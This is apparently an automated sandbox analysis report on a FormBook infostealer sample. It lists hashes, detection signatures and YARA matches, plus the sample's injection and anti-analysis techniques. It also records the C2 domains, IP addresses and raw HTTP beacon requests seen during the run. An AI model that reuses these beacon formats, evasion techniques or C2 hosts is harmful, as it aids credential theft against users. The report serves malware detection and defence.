Windows Analysis Report ejecutable1.exe

Overview

General Information

Sample Name: ejecutable1.exe
Analysis ID: 491544
MD5: ff2724ddf0ef0525e9e419db5199e96f
SHA1: 3cda3d12e93a6e06f22e205010cb6c3d674285a1
SHA256: 5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: ejecutable1.exe Virustotal: Detection: 36%
Source: ejecutable1.exe ReversingLabs: Detection: 13%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.ejecutable1.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: ejecutable1.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: ejecutable1.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.dunedinhyperlocal.com
Source: C:\Windows\explorer.exe Domain query: www.multicoininvestment.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Domain query: www.institutosamar.com
Source: C:\Windows\explorer.exe Domain query: www.petersonmovingco.com
Source: C:\Windows\explorer.exe Domain query: www.quinnwebster.top
Source: C:\Windows\explorer.exe Domain query: www.lianxiwan.xyz
Source: C:\Windows\explorer.exe Domain query: www.oinfoproduto.com
Source: C:\Windows\explorer.exe Domain query: www.theseattlenotary.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.lianxiwan.xyz
Source: DNS query: www.lianxiwan.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.dunedinhyperlocal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1Host: www.oinfoproduto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1Host: www.multicoininvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.theseattlenotary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1Host: www.petersonmovingco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1Host: www.quinnwebster.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 15:32:40 GMTServer: nginx/1.19.5Content-Type: text/htmlContent-Length: 583Last-Modified: Sat, 24 Jul 2021 10:05:02 GMTAccept-Ranges: bytesVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: http://business.google.com/
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000003.00000000.428142762.0000000003E50000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667305054.00000000020E0000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: msdt.exe, 00000004.00000002.666538687.00000000003F9000.00000004.00000020.sdmp, msdt.exe, 00000004.00000002.666548050.0000000000406000.00000004.00000020.sdmp String found in binary or memory: http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e
Source: explorer.exe, 00000003.00000000.414954186.0000000007147000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000003.00000000.413576733.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000003.00000000.433820327.0000000008434000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: ejecutable1.exe, ejecutable1.exe, 00000002.00000000.405132537.0000000000F52000.00000020.00020000.sdmp, msdt.exe, 00000004.00000002.668352306.0000000002A87000.00000004.00020000.sdmp String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: https://ads.google.com/localservices
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: https://business.google.com
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: https://schema.org/Locuseriness
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmp String found in binary or memory: https://workspace.google.com
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown DNS traffic detected: queries for: www.wwiilive.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: ejecutable1.exe, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Uses 32bit PE files
Source: ejecutable1.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_002769C9 0_2_002769C9
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00276D30 0_2_00276D30
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_002790C0 0_2_002790C0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_002790D0 0_2_002790D0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_0027A44B 0_2_0027A44B
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA67E7 0_2_00DA67E7
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA0048 0_2_00DA0048
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA5C18 0_2_00DA5C18
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00DA0012 0_2_00DA0012
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_00F57447 0_2_00F57447
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 0_2_002700F0 0_2_002700F0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041BA85 2_2_0041BA85
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041C296 2_2_0041C296
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041BBE0 2_2_0041BBE0
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00408C6B 2_2_00408C6B
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00408C70 2_2_00408C70
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041C40C 2_2_0041C40C
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_0041C4F7 2_2_0041C4F7
